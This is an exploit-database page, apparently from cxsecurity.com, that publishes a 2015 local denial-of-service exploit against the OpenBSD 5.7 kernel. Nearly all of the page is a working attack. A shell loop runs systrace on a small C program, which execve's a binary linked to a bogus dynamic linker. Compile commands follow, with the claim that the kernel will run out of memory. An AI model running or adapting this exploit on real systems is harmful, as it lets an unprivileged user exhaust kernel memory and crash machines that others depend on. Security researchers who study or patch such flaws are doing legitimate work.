OpenBSD 5.7 Local Denial Of Service

2015.08.03
Credit: The Brainy Code Scanner
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* * 2015, Maxime Villard * Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged * user. Found by The Brainy Code Scanner. */ - - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - - #! /bin/sh while true do systrace -A ./exploit done - - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - - #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { execve("bin", argv, NULL); } - - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - - int main() {} - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - $ gcc -o exploit exploit.c $ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c $ ./script.sh Wait a bit, and the kernel will run out of memory.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top